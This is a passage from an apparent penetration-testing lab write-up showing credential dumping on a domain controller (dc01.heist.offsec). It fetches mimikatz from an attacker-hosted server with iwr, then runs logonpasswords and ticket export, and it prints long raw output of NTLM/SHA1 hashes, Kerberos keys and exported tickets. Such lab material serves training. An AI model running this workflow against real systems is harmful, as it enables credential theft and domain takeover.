Credential Dump
System level compromise has been achieved on the dc01.heist.offsec(192.168.198.165) host.
Dumping credentials
mimikatz
PS C:\tmp> iwr -Uri http://192.168.45.176/mimikatz.exe -OutFile C:\tmp\mimikatz.exeUploading mimikatz.exe
sekurlsa::logonpasswords
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" # Base credentials
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80645653 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80670468 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 69682 (00000000:00011032)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : b4063f6d0dcb5265dc5f62b0309e4ae3
* SHA1 : a5ec93cd9e239957b70d11328ab953b20060b5db
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : DC01$
* Domain : heist.offsec
* Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : 1561bd404f929907a89517d421b5f11b
* SHA1 : 38fa65451f13e088d5d078609994c1fd14a35412
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : dc01$
* Domain : HEIST.OFFSEC
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 42579 (00000000:0000a653)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : b4063f6d0dcb5265dc5f62b0309e4ae3
* SHA1 : a5ec93cd9e239957b70d11328ab953b20060b5db
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : DC01$
* Domain : heist.offsec
* Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64
ssp :
credman :
Authentication Id : 0 ; 39710 (00000000:00009b1e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 8/1/2024 7:27:30 PM
SID :
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : 1561bd404f929907a89517d421b5f11b
* SHA1 : 38fa65451f13e088d5d078609994c1fd14a35412
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 446257 (00000000:0006cf31)
Session : Service from 0
User Name : enox
Domain : HEIST
Logon Server : DC01
Logon Time : 8/1/2024 7:28:11 PM
SID : S-1-5-21-537427935-490066102-1511301751-1103
msv :
[00000003] Primary
* Username : enox
* Domain : HEIST
* NTLM : bddb2a060aac3fb97c34707fabee7f30
* SHA1 : 2623046d4ccacd41f7a908c769159d2d47f4a413
* DPAPI : ef151fe09709c9334485fc9640f4b1f5
tspkg :
wdigest :
* Username : enox
* Domain : HEIST
* Password : (null)
kerberos :
* Username : enox
* Domain : HEIST.OFFSEC
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 69663 (00000000:0001101f)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : 1561bd404f929907a89517d421b5f11b
* SHA1 : 38fa65451f13e088d5d078609994c1fd14a35412
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : DC01$
* Domain : heist.offsec
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
ssp :
credman :
Authentication Id : 0 ; 42584 (00000000:0000a658)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : b4063f6d0dcb5265dc5f62b0309e4ae3
* SHA1 : a5ec93cd9e239957b70d11328ab953b20060b5db
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : DC01$
* Domain : heist.offsec
* Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64
ssp :
credman :
Authentication Id : 0 ; 42510 (00000000:0000a60e)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : 1561bd404f929907a89517d421b5f11b
* SHA1 : 38fa65451f13e088d5d078609994c1fd14a35412
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : DC01$
* Domain : heist.offsec
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
ssp :
credman :
Authentication Id : 0 ; 42419 (00000000:0000a5b3)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DC01$
* Domain : HEIST
* NTLM : 1561bd404f929907a89517d421b5f11b
* SHA1 : 38fa65451f13e088d5d078609994c1fd14a35412
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : DC01$
* Domain : heist.offsec
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 8/1/2024 7:27:30 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DC01$
* Domain : HEIST
* Password : (null)
kerberos :
* Username : dc01$
* Domain : HEIST.OFFSEC
* Password : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
ssp :
credman :
mimikatz(commandline) # exit
Bye!DC01$:1561bd404f929907a89517d421b5f11benox:bddb2a060aac3fb97c34707fabee7f30
sekurlsa::tickets
PS C:\tmp> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit" ; dir *.kirbi # All tickets
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::tickets /export
Authentication Id : 0 ; 79087016 (00000000:04b6c5a8)
Session : Network from 0
User Name : svc_apache$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 9:35:40 AM
SID : S-1-5-21-537427935-490066102-1511301751-1105
* Username : svc_apache$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 9:16:27 AM ; 7/7/2025 7:12:48 PM ;
Service Name (01) : HTTP ; dc01.heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : svc_apache$ ; @ HEIST.OFFSEC
Flags 50a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
e08633d0819ff3a5f7984d92a67c6ad3a298abb4be93881c41d92d1832a0a19c
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;4b6c5a8]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 18659765 (00000000:011cb9b5)
Session : Network from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 6:51:36 AM
SID : S-1-5-18
* Username : DC01$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 6:51:36 AM ; 7/7/2025 4:39:05 PM ;
Service Name (02) : GC ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
0b0d9c36e92a3ec3af5d54819d426b8bf9f5c87c78310b0539708d7440343ce7
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;11cb9b5]-1-0-40a50000-DC01$@GC-DC01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 2455887 (00000000:0025794f)
Session : Network from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 6:41:40 AM
SID : S-1-5-18
* Username : DC01$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ;
Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;25794f]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 69682 (00000000:00011032)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-90-0-1
* Username : DC01$
* Domain : heist.offsec
* Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-20
* Username : dc01$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:11 AM ; 7/7/2025 4:39:11 PM ; 7/14/2025 6:39:11 AM
Service Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Target Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
77198af9f6bc6ab43a2942a1eb5a991a323c07a1064c4fedbff9adc4f332cb3f
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;3e4]-0-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:11 AM ; 7/7/2025 4:39:11 PM ; 7/14/2025 6:39:11 AM
Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
Target Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC ( HEIST.OFFSEC )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
bb1ed6e6ba4fb8ca6ea521e4cd4886f4c7b4b0d38b85917437b5c8c0113e4b9c
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;3e4]-2-0-40e10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
Authentication Id : 0 ; 42579 (00000000:0000a653)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 8/1/2024 7:27:32 PM
SID : S-1-5-96-0-1
* Username : DC01$
* Domain : heist.offsec
* Password : ad db c0 be a8 03 65 40 f3 d3 fd 82 2c fa 15 d6 0d 38 59 13 77 da 11 22 96 96 87 05 2d cc b8 22 fa 9b e9 32 8d df 11 0d ac b9 1b 97 68 6b 9f 2e e5 25 98 a6 ff 75 ac de a3 cd 9a 17 d7 3d 33 f9 12 7b 71 bd f5 d8 0b 37 d0 a0 8c d8 b9 90 f4 56 e0 c3 fc 15 70 29 ae 9e b1 3f 84 70 59 f6 91 7d 0b 2f 26 7f 42 9c 21 86 4b 2b bf 43 00 db d9 4c 51 ec a7 ac ed d4 81 1f 1f bb e4 54 d7 96 3d a1 b0 23 24 e9 c3 f2 07 b6 42 c7 1f 09 7f 00 8c 6d 96 23 d5 52 c1 c6 aa 96 aa 28 c0 1b 5a 07 c9 dd 77 c2 fe f0 39 f3 a7 97 28 e6 c1 a1 a9 9a 46 f0 f9 73 38 25 9a f7 a5 66 32 0b f2 b8 48 7e 90 a8 6a d0 2e 5d ca 78 f5 27 05 46 fc 1a 0a 91 71 ff f7 a7 6d 6d a7 50 1a 7b 29 36 dd ec 71 89 02 e1 55 78 2b b2 d9 07 06 44 8a 50 d4 32 e4 84 a7 64
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 78904294 (00000000:04b3fbe6)
Session : Network from 0
User Name : svc_apache$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 9:16:27 AM
SID : S-1-5-21-537427935-490066102-1511301751-1105
* Username : svc_apache$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 9:16:27 AM ; 7/7/2025 7:12:48 PM ;
Service Name (01) : HTTP ; dc01.heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : svc_apache$ ; @ HEIST.OFFSEC
Flags 50a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
e08633d0819ff3a5f7984d92a67c6ad3a298abb4be93881c41d92d1832a0a19c
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;4b3fbe6]-1-0-50a50000-svc_apache$@HTTP-dc01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 9197975 (00000000:008c5997)
Session : Network from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 6:46:41 AM
SID : S-1-5-18
* Username : DC01$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ;
Service Name (02) : ldap ; DC01.heist.offsec ; heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
e3debf27461bcc5343d2c085f52370682c7fcc60141ef0d5d3ea24a929f39d6e
Ticket : 0x00000012 - aes256_hmac ; kvno = 6 [...]
* Saved to file [0;8c5997]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 2452729 (00000000:00256cf9)
Session : Network from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 6:41:40 AM
SID : S-1-5-18
* Username : DC01$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ;
Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;256cf9]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 2452458 (00000000:00256bea)
Session : Network from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 6:41:40 AM
SID : S-1-5-18
* Username : DC01$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:05 AM ; 7/7/2025 4:39:05 PM ;
Service Name (02) : ldap ; DC01.heist.offsec ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
5565e77907f41fd33382950b154790263a4f77f1cfd4ad4ec225549a59e8e000
Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...]
* Saved to file [0;256bea]-1-0-40a50000-DC01$@ldap-DC01.heist.offsec.kirbi !
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 1097746 (00000000:0010c012)
Session : Network from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 6:39:08 AM
SID : S-1-5-18
* Username : DC01$
* Domain : HEIST.OFFSEC
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 7/7/2025 6:39:08 AM ; 7/7/2025 4:39:05 PM ; 7/14/2025 6:39:05 AM
Service Name (02) : krbtgt ; HEIST.OFFSEC ; @ HEIST.OFFSEC
Target Name (--) : @ HEIST.OFFSEC
Client Name (01) : DC01$ ; @ HEIST.OFFSEC
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
7eaee295a9e8b9a20981c84956a448c8a8f12076fa1a5107cc8e0e97d1169975
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;10c012]-2-0-60a10000-DC01$@krbtgt-HEIST.OFFSEC.kirbi !
Authentication Id : 0 ; 1019808 (00000000:000f8fa0)
Session : Network from 0
User Name : DC01$
Domain : HEIST
Logon Server : (null)
Logon Time : 7/7/2025 6:39:05 AM
SID : S-1-5-18
* Username : DC01$
* Domain : HEIST.OFFSEC
* Password : (null)
